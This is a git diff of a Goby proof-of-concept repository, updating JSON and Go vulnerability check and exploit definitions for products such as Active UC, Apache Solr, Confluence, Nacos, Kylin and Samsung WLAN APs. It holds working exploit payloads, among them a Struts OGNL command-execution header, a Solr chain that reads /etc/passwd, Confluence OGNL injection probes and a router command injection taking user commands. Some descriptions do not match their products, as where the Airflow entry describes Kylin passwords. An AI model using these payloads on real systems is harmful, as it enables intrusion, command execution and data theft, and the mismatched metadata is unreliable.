@@ -1,28 +1,29 @@ { - "Name": "Active UC index.action 远程命令执行漏洞", + "Name": "Active UC index.action RCE", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "title=\"网动统一通信平台(Active UC)\"", - "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令", - "Product": "网动统一通信平台(Active UC)", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Description": "", + "Product": "Active UC", + "Homepage": "http://www.iactive.com.cn/", + "Author": "", + "Impact": "Active UC index.action has a RCE vulnerability.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "cmd", + "Type": "input", + "Value": "whoami" + } ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -41,7 +42,7 @@ "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -59,7 +60,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -72,12 +73,12 @@ "Connection": "close", "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", "Charsert": "UTF-8", - "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", + "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", "Cache-Control": "no-cache", "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -93,10 +94,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-28 10:08:54", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Alibaba_Nacos_Add_user_not_authorized.json b/poc/Alibaba_Nacos_Add_user_not_authorized.json index e9a08ef..c5933e8 100644 --- a/poc/Alibaba_Nacos_Add_user_not_authorized.json +++ b/poc/Alibaba_Nacos_Add_user_not_authorized.json @@ -2,39 +2,38 @@ "Name": "Alibaba Nacos Add user not authorized", "Level": "2", "Tags": [ - "Ultra vires" + "unauthorized" ], - "GobyQuery": "title==\"Nacos\"", - "Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", + "GobyQuery": "title=\"Nacos\"", + "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "PeiQi", - "Impact": "Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.
Upgrade version
Log in to the background to view sensitive information
Upgrade version
", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "OR", { @@ -71,6 +75,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-04 18:56:41", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Apache_Airflow_Unauthorized.json b/poc/Apache_Airflow_Unauthorized.json index 1cc21ae..23d8bc4 100644 --- a/poc/Apache_Airflow_Unauthorized.json +++ b/poc/Apache_Airflow_Unauthorized.json @@ -1,18 +1,18 @@ { "Name": "Apache Airflow Unauthorized", - "Level": "3", + "Level": "2", "Tags": [ "Unauthorized" ], "GobyQuery": "app=\"APACHE-Airflow\"", - "Description": "remote attacker to gain unauthorized access to a targeted system", + "Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.", "Product": "APACHE-Airflow", "Homepage": "https://airflow.apache.org/", - "Author": "aetkrad", - "Impact": "This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs
The attacker will log into the background as an administrator to further attack
", - "Recommandation": "undefined
", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -51,6 +55,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-04 15:51:21", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json b/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json index 17526a7..452be2f 100644 --- a/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json +++ b/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json @@ -1,28 +1,31 @@ { - "Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)", - "Level": "0", + "Name": "Apache Kylin API Unauthorized Access CVE-2020-13937", + "Level": "1", "Tags": [ - "Disclosure of Sensitive Information" + "unauthorized" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.", + "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", "Product": "Apache kylin", "Homepage": "http://kylin.apache.org/", - "Author": "PeiQi", - "Impact": "Attackers can use this vulnerability to obtain sensitive information of the system.
Upgrade to the safe version, or perform the following mitigation measures:
Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \";
Delete the following line \"< scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/>\";
Restart the kylin instance to take effect.
", + "Author": "", + "Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.", + "Recommendation": "update", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2020-13937" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Config", - "type": "select", - "value": "/kylin/api/admin/config", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Config", + "Type": "select", + "Value": "/kylin/api/admin/config" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,7 +33,7 @@ "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -57,18 +60,18 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -89,10 +92,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-04-04 15:55:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Apache_Solr_File_Read.go b/poc/Apache_Solr_File_Read.go index 8633089..d696d53 100644 --- a/poc/Apache_Solr_File_Read.go +++ b/poc/Apache_Solr_File_Read.go @@ -26,45 +26,11 @@ func init() { "Content": "" }, "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/solr/core/debug/dump?param=ContentStreams", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "stream.url=file:///etc/passwd" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "root:x:0", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ "AND", { "Request": { "method": "GET", - "uri": "/test.php", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", "follow_redirect": true, "header": {}, "data_type": "text", @@ -85,7 +51,107 @@ func init() { "type": "item", "variable": "$body", "operation": "contains", - "value": "test", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [ + "core_name|lastbody|regex|\"name\":\"(.*?)\"" + ] + }, + { + "Request": { + "method": "POST", + "uri": "/solr/{{{core_name}}}/config", + "follow_redirect": true, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/solr/{{{core_name}}}/debug/dump?param=ContentStreams", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "stream.url=file:///etc/passwd" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "root", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "", "bz": "" } ] diff --git a/poc/Aspcms_Backend_Leak.json b/poc/Aspcms_Backend_Leak.json index 33d3b2c..9a05735 100644 --- a/poc/Aspcms_Backend_Leak.json +++ b/poc/Aspcms_Backend_Leak.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "app=\"ASPCMS\"", - "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", + "Description": "aspCMS is a module based ASP Content Management System (CMS).", "Product": "ASPCMS", - "Homepage": "https://gobies.org/", - "Author": "aetkrad", - "Impact": "leak backend url
An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.
General repair suggestions:
Check and upgrade to the secure version based on the information in the affected version. The official download link is :https://www.atlassian.com/software/confluence/download-archives
Temporary repair suggestions:
If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
", + "Author": "", + "Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", + "Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "References": [ - "https://github.com/alt3kx/CVE-2021-26084_PoC" + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://jira.atlassian.com/browse/CONFSERVER-67940", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html" ], "HasExp": true, "ExpParams": [ { - "Name": "command", + "Name": "Command", "Type": "input", "Value": "whoami" + }, + { + "Name": "Path", + "Type": "select", + "Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features" } ], "ExpTips": { @@ -27,7 +34,7 @@ "Content": "" }, "ScanSteps": [ - "AND", + "OR", { "Request": { "method": "POST", @@ -37,12 +44,8 @@ "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", - "data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027", - "set_variable": [ - "r1|rand|int|8", - "r2|rand|int|7", - "r4|r1|add|r2" - ] + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -59,14 +62,420 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "{{{r4}}}", + "value": "value=\"aaaa{140592=null}", "bz": "" } ] }, - "SetVariable": [ - "output|lastbody|regex|" - ] + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/doenterpagevariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage.action?spaceKey=myproj", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/templates2/viewpagetemplate.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/template/custom/content-editor", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/templates/editor-preload-container", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/users/user-dark-features", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] } ], "ExploitSteps": [ @@ -74,7 +483,7 @@ { "Request": { "method": "POST", - "uri": "/pages/createpage-entervariables.action?SpaceKey=x", + "uri": "{{{Path}}}", "follow_redirect": true, "header": { "Content-Type": "application/x-www-form-urlencoded" @@ -101,6 +510,6 @@ ] } ], - "PostTime": "2021-09-03 11:27:04", - "GobyVersion": "1.8.300" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Cacti_Weathermap_File_Write.json b/poc/Cacti_Weathermap_File_Write.json index b3c1e1d..440107e 100644 --- a/poc/Cacti_Weathermap_File_Write.json +++ b/poc/Cacti_Weathermap_File_Write.json @@ -4,12 +4,12 @@ "Tags": [ "getshell" ], - "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", - "Description": "allows remote attackers to upload and execute arbitrary files", - "Product": "cacti-监控系统", + "GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"", + "Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", + "Product": "cacti", "Homepage": "https://www.cacti.net/", - "Author": "aetkrad", - "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.
resulting in unauthorized access to sensitive information
暂无
", - "Recommandation": "暂无
", - "References": [ - "Internet" + "Tags": [ + "rce" ], + "GobyQuery": "title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + "Description": "Samsung WLAN AP WEA453e", + "Product": "Samsung WLAN AP WEA453e", + "Homepage": "https://www.samsung.com/", + "Author": "", + "Impact": "Samsung WLAN AP wea453e router has a remote command execution vulnerability.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "cat /etc/passwd" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { "Request": { - "method": "POST", + "method": "GET", "uri": "/(download)/tmp/a.txt", - "follow_redirect": true, + "follow_redirect": false, "header": { - "Connection": "close", - "Content-Length": "48" + "Content-Type": "application/json;charset=UTF-8" }, "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" + "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -46,9 +58,43 @@ } ] }, - "SetVariable": [] + "SetVariable": [ + "output|lastbody|regex|" + ] } ], - "PostTime": "2021-04-01 11:47:39", - "GobyVersion": "1.8.237" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/(download)/tmp/a.txt", + "follow_redirect": false, + "header": { + "Content-Type": "application/json;charset=UTF-8" + }, + "data_type": "text", + "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Security_Devices_Hardcoded_Password.json b/poc/Security_Devices_Hardcoded_Password.json index f50e512..49a522c 100644 --- a/poc/Security_Devices_Hardcoded_Password.json +++ b/poc/Security_Devices_Hardcoded_Password.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"", - "Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。", - "Product": "多个", - "Homepage": "无", - "Author": "aetkrad", - "Impact": "", + "Description": "", + "Product": "", + "Homepage": "", + "Author": "", + "Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.", "Recommendation": "", "References": [ "https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw" @@ -94,6 +94,6 @@ ] } ], - "PostTime": "2021-12-06 16:14:12", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/SonarQube_unauth_CVE_2020_27986.json b/poc/SonarQube_unauth_CVE_2020_27986.json index 53cfdc9..e736b52 100644 --- a/poc/SonarQube_unauth_CVE_2020_27986.json +++ b/poc/SonarQube_unauth_CVE_2020_27986.json @@ -4,7 +4,7 @@ "Tags": [ "unauth" ], - "GobyQuery": "app=\"SonarQube-code management\"", + "GobyQuery": "app=\"SonarQube\"", "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", "Product": "SonarQube", "Homepage": "https://www.sonarqube.org/", @@ -14,7 +14,7 @@ "References": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" ], - "HasExp": true, + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,50 +64,6 @@ ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/api/settings/values", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "sonaranalyzer-cs.nuget.packageVersion", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "sonar.core.id", - "bz": "" - } - ] - }, - 